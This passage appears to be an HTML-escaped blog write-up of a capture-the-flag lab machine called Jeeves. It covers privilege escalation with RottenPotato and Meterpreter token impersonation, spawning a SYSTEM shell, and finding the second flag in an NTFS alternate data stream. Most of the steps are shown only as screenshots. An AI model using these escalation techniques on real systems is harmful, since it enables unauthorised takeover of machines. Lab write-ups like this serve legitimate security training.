&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsy4AWlX18De_TrKyZkC7Vv-YlJiY6NEbJy0xzx3lcj8oFZV1ERMg6pTfejRpLt38xrL-oKlIfAg3T3yjbgxvlXnkx73CxRsSZtl4XN8vPAixW1lQnWAPT3NjwXK5m7xSzX_SjrPbytKIQ/s1600/screenshot.26.jpg&quot; imageanchor=&quot;1&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsy4AWlX18De_TrKyZkC7Vv-YlJiY6NEbJy0xzx3lcj8oFZV1ERMg6pTfejRpLt38xrL-oKlIfAg3T3yjbgxvlXnkx73CxRsSZtl4XN8vPAixW1lQnWAPT3NjwXK5m7xSzX_SjrPbytKIQ/s1600/screenshot.26.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- &lt;b&gt;RottenPotato&lt;/b&gt; is a local privilege escalation binary from service account to System:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDIOBV2cvDSESUGvHlAWDFg5cdHPtXuVd3SWj8GKcwZ0Y0vBgYEKYD2Zop-N7waCWuaC3SncP1Rk40qJtlqJKmXw4nsupKdS-OrtaLpdR7bmIu-tQh1gpfxelUCHGHL6RsRi_chwkDZjQF/s1600/screenshot.50.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDIOBV2cvDSESUGvHlAWDFg5cdHPtXuVd3SWj8GKcwZ0Y0vBgYEKYD2Zop-N7waCWuaC3SncP1Rk40qJtlqJKmXw4nsupKdS-OrtaLpdR7bmIu-tQh1gpfxelUCHGHL6RsRi_chwkDZjQF/s1600/screenshot.50.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Downloading &lt;b&gt;rottenpotato.exe&lt;/b&gt; to Kali:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxiD8cPq8e02EjyxQvNUmsHES70sE2w6umTqIA9umFnuIYEO1cMcY63uE834Kxs2kLhl7Jtqqg1x_Xai1DC72z3Iwe4XwGExZe8x5NQqecr7RPSd-IXmoQdaNHhmqoR-zi4kbhsdQ-wqOl/s1600/screenshot.33.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxiD8cPq8e02EjyxQvNUmsHES70sE2w6umTqIA9umFnuIYEO1cMcY63uE834Kxs2kLhl7Jtqqg1x_Xai1DC72z3Iwe4XwGExZe8x5NQqecr7RPSd-IXmoQdaNHhmqoR-zi4kbhsdQ-wqOl/s1600/screenshot.33.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Getting as many system privilege as possible with &lt;b&gt;getprivs&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiggOzcQMoi6HMof77wyRAcxmIoHG_mf3fZZGCWoIQc-YiUDd_XTqxP0Z6ClvG4Mxh51uTLn-nlMF0rJsGBj33BXrxeJi_0lZeobtnmwMR_Ter5mlw34QwDmUhNDJ_Bl7Lr0-ritCFeUmrh/s1600/screenshot.32.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;303&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiggOzcQMoi6HMof77wyRAcxmIoHG_mf3fZZGCWoIQc-YiUDd_XTqxP0Z6ClvG4Mxh51uTLn-nlMF0rJsGBj33BXrxeJi_0lZeobtnmwMR_Ter5mlw34QwDmUhNDJ_Bl7Lr0-ritCFeUmrh/s320/screenshot.32.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Uploading&lt;b&gt; rottenpotato.exe&lt;/b&gt; to &lt;b&gt;Jeeves&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYP1cMr_Ex6gSjZ6HBR7xg30U2sC4CDTVZyf1JKB5FDISuCrX5wBNHWrOkD9zzGFU-ro3sDEtRqnNuFvTM6PuYv11iVyJoZG-XGAhX01jydPSKuaxETBGBK419MOfy_pBYBpSDwzGik7uj/s1600/screenshot.34.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYP1cMr_Ex6gSjZ6HBR7xg30U2sC4CDTVZyf1JKB5FDISuCrX5wBNHWrOkD9zzGFU-ro3sDEtRqnNuFvTM6PuYv11iVyJoZG-XGAhX01jydPSKuaxETBGBK419MOfy_pBYBpSDwzGik7uj/s1600/screenshot.34.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Loading the &lt;b&gt;incognito&lt;/b&gt; extension:&lt;/span&gt;&lt;br /&gt;

&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw8BHatufb00aUVMubWKALw3hnuG7LwJUxO72gUgbMeHuXwiN0uM6CQWDRcFsNQ-pkXtxVnAlFLnHGYfMh6Vc00JJ2cosW5Aeax-j8-6l8Y6m9-VXgqHmrFnlcjgU3ll_7uahbNcr_QRAb/s1600/screenshot.36.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw8BHatufb00aUVMubWKALw3hnuG7LwJUxO72gUgbMeHuXwiN0uM6CQWDRcFsNQ-pkXtxVnAlFLnHGYfMh6Vc00JJ2cosW5Aeax-j8-6l8Y6m9-VXgqHmrFnlcjgU3ll_7uahbNcr_QRAb/s1600/screenshot.36.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Executing &lt;b&gt;rottenpotato.exe&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWJG9WfJg-fvP3emiC3xqn8D-urBr3tj_A_pyI1LMOHxnldELJA_QFF8IhQ_SQcTWdpdrd8FW6V9qG83sklZldU7HL-rRqRfGQeUl8WvbJFhAkgSRdz-ValRF-3CPzXSfkMX90AW1OGF_o/s1600/screenshot.37.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWJG9WfJg-fvP3emiC3xqn8D-urBr3tj_A_pyI1LMOHxnldELJA_QFF8IhQ_SQcTWdpdrd8FW6V9qG83sklZldU7HL-rRqRfGQeUl8WvbJFhAkgSRdz-ValRF-3CPzXSfkMX90AW1OGF_o/s1600/screenshot.37.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Impersonating as &lt;b&gt;System&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQONClVpPBd-Kgmwaa7WGb3JgrvLanKO8_aaa7KU1p4qpoJfgV23eSqrVlh7cncQoXNfJPHAzXVSQ5SImNv0HKWAc4Vy1eXU4CNCXx3DPb4VEeFAqPTQ4yr7KOFkkJyZdFNnyv0oDm1R42/s1600/screenshot.38.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQONClVpPBd-Kgmwaa7WGb3JgrvLanKO8_aaa7KU1p4qpoJfgV23eSqrVlh7cncQoXNfJPHAzXVSQ5SImNv0HKWAc4Vy1eXU4CNCXx3DPb4VEeFAqPTQ4yr7KOFkkJyZdFNnyv0oDm1R42/s1600/screenshot.38.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Now we&#39;ve got &lt;b&gt;System&lt;/b&gt; privileges:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfQFkLElXw1PF2bfgsmmAXZSHiTjrhwnVCRmR9-LVDGYBgNamnRpwXnrsW0pQzRjdiAp7HCkxrQd6aL_S4zU_VAGubpwaoSUyym1ZgAao4N6XnjA4HUr9VMfFEovEvd3BkCF8d53N4xFgI/s1600/screenshot.39.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfQFkLElXw1PF2bfgsmmAXZSHiTjrhwnVCRmR9-LVDGYBgNamnRpwXnrsW0pQzRjdiAp7HCkxrQd6aL_S4zU_VAGubpwaoSUyym1ZgAao4N6XnjA4HUr9VMfFEovEvd3BkCF8d53N4xFgI/s1600/screenshot.39.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Spawning a shell:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgRMuUghGi0kCnlsB9tgEB7Zep0uNph0UXzPTIWvnBLycXcC7bRFDT3iaSJk3YZn862naxjfBc5hwPe1nfWmZi6NWDPsVcjGYJZkX7-NmvAzps8t4Oz_Jj7hzMKW82WvYjkuyJCza4PTfy/s1600/screenshot.43.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgRMuUghGi0kCnlsB9tgEB7Zep0uNph0UXzPTIWvnBLycXcC7bRFDT3iaSJk3YZn862naxjfBc5hwPe1nfWmZi6NWDPsVcjGYJZkX7-NmvAzps8t4Oz_Jj7hzMKW82WvYjkuyJCza4PTfy/s1600/screenshot.43.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_JagKChy2iG_TFBP4lruDQgQVEBmis-T4q3pKis2dFAiIzGFl2TaS3zJhjlBdm79Z0iE-Tv5HH-amyRZ42MgWHtxhAVPs64nHkb04m8bCGUbUnCaGLo7RQK1drGVd483EaQb20ezjN8IK/s1600/screenshot.45.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_JagKChy2iG_TFBP4lruDQgQVEBmis-T4q3pKis2dFAiIzGFl2TaS3zJhjlBdm79Z0iE-Tv5HH-amyRZ42MgWHtxhAVPs64nHkb04m8bCGUbUnCaGLo7RQK1drGVd483EaQb20ezjN8IK/s1600/screenshot.45.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;5 - CAPTURING THE 1st FLAG&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Reading &lt;b&gt;user.txt&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMDA_pIgpnKL79Ds0hKqe91uvvM-csd9jtO9MtKEUdDpz9SvKlr_jNlRGoR_AspAHu76QParPpcgnYVlhxbp05fIfN9GxGvzFGM6jKLCgagwdcpludyQzgNUMQFNBcyeaXVu1nU-wcOsoX/s1600/screenshot.44.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMDA_pIgpnKL79Ds0hKqe91uvvM-csd9jtO9MtKEUdDpz9SvKlr_jNlRGoR_AspAHu76QParPpcgnYVlhxbp05fIfN9GxGvzFGM6jKLCgagwdcpludyQzgNUMQFNBcyeaXVu1nU-wcOsoX/s1600/screenshot.44.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;6 - CAPTURING THE 2nd FLAG&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Going to the &lt;b&gt;Administrator&#39;s Desktop&lt;/b&gt; we find &lt;b&gt;hm.txt&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6zqGMHVNktkSB2ptArFP1dGI0OlL9IbGAvNPeONlk-aLUNTOepAdFyE9Aecl0Gd4nm6lO5RilfUQj4LUjgCepHES6eeEb9mZqxBHwCJ-Vmrx8UBO0TCLY1RefzBpiAeieKBFptrFH8vEE/s1600/screenshot.47.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6zqGMHVNktkSB2ptArFP1dGI0OlL9IbGAvNPeONlk-aLUNTOepAdFyE9Aecl0Gd4nm6lO5RilfUQj4LUjgCepHES6eeEb9mZqxBHwCJ-Vmrx8UBO0TCLY1RefzBpiAeieKBFptrFH8vEE/s1600/screenshot.47.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;-&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;b&gt;Alternate Data Stream (ADS)&lt;/b&gt; is the ability of an &lt;b&gt;NTFS&lt;/b&gt; file system (the main file system format in Windows) to store different streams of data, in addition to the default stream which is normally used for a file.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;- The two stream types that are commonly used directly by Windows programs are data ($DATA) and index ($INDEX_ALLOCATION).&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;- The relevant attribute for our scope is the $DATA attribute, which is used to store the data streams of a file.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;- In the past, it was common to store a malicious payload within an ADS of a legitimate file. But today, many today security solutions will detect and scan ADSs’.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;- For further information:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;https://www.blogger.com/goog_1642101233&quot;&gt;&lt;br /&gt;&lt;/a&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams&quot;&gt;https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;https://www.deepinstinct.com/2018/06/12/the-abuse-of-alternate-data-stream-hasnt-disappeared/&quot;&gt;https://www.deepinstinct.com/2018/06/12/the-abuse-of-alternate-data-stream-hasnt-disappeared/&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;https://stackoverflow.com/questions/50518734/dir-r-and-output-stream-in-windows-machine&quot;&gt;https://stackoverflow.com/questions/50518734/dir-r-and-output-stream-in-windows-machine&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;-&amp;nbsp; The option&amp;nbsp;&lt;b&gt;dir /R&lt;/b&gt;&amp;nbsp;calls &lt;b&gt;FindFirstStreamW&lt;/b&gt; and &lt;b&gt;FindNextStreamW&lt;/b&gt; on each file or directory in a listing in order to list its $DATA streams:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-dRrc1ZDTCRg0amiU7mJoY47bdQYPhrnpKJPKUukaowyOexzD5XBFJ5w43o4M8q7-nnDccZjDcZTDQHDoNoN3jSmDn_M84YkiIF98EiSO7wSBz9jUA-iTxqgKvXlzXhyphenhyphen7jbjO8qb9Fybx/s1600/screenshot.48.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-dRrc1ZDTCRg0amiU7mJoY47bdQYPhrnpKJPKUukaowyOexzD5XBFJ5w43o4M8q7-nnDccZjDcZTDQHDoNoN3jSmDn_M84YkiIF98EiSO7wSBz9jUA-iTxqgKvXlzXhyphenhyphen7jbjO8qb9Fybx/s1600/screenshot.48.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

